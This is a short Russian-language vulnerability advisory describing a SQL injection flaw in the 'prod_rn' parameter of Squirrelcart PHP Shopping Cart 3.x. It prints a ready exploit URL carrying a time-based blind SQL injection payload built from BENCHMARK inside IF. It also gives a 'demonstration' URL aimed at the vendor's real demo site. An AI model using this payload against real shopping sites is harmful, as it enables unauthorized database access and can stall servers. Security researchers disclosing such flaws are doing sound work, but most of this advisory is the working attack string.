Программа: Squirrelcart PHP Shopping Cart 3.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "prod_rn" сценарием index.php (когда "add_to_cart"
установлен). Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://site/path/index.php?add_to_cart=10&prod_rn=271 AND (SELECT(IF(0x41=0x41,
BENCHMARK(9999999999,NULL),NULL)))

Демонстрация:

http://www.squirrelcart.com/demo1/index.php?add_to_cart=1&prod_rn=271 AND (SELECT(IF(0x41=0x41,
BENCHMARK(9999999999,NULL),NULL)))



Оставить мнение